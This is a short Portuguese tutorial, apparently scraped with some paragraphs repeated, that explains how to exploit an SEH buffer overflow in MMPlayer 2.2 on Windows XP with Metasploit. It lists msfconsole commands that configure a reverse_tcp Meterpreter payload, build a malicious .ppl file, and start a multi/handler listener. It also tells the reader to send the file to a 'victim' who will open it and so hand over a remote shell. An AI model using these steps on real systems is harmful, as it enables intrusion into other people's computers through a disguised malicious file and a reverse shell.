Este módulo explora um buffer overflow no MMPlayer 2,2 a vulnerabilidade é acionada ao abrir um arquivo malformado M3U/PPL que contém uma cadeia muito longa, o que resulta na substituição de um registro SEH, permitindo assim a execução de código arbitrário no contexto do usuário.
Exploit Metas
MMPlayer 2,2
Windows XP SP 2
Exigência
Atacante : Backtrack 5
Vítima PC : Windows XP
Abrir o terminal msfconsole
Agora digite use exploit/windows/fileformat/tfm_mmplayer_m3u_ppl_bof
Depois conseguimos gerar o arquivo malicioso, ele será armazenado em seu computador local
/root/.msf4/local/msf.ppl
Agora precisamos configurar um ouvinte para lidar com conexão reversa enviada por vítima quando o exploit for executado com sucesso.
Agora envie o seu msf.ppl para vítima, assim que ela baixar e abri-lo você pode acessar o Meterpreter shell no computador da vítima.
Exploit Metas
MMPlayer 2,2
Windows XP SP 2
Exigência
Atacante : Backtrack 5
Vítima PC : Windows XP
Abrir o terminal msfconsole
Agora digite use exploit/windows/fileformat/tfm_mmplayer_m3u_ppl_bof
Código:
Msf exploit (tfm_mmplayer_m3u_ppl_bof)>set payload windows/meterpreter/reverse_tcp Msf exploit (tfm_mmplayer_m3u_ppl_bof)>set lhost 192.168.1.2 (IP of Local Host) Msf exploit (tfm_mmplayer_m3u_ppl_bof)>set srvhost 192.168.1.2 Msf exploit (tfm_mmplayer_m3u_ppl_bof)>exploit
Depois conseguimos gerar o arquivo malicioso, ele será armazenado em seu computador local
/root/.msf4/local/msf.ppl
Agora precisamos configurar um ouvinte para lidar com conexão reversa enviada por vítima quando o exploit for executado com sucesso.
Código:
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.2 exploit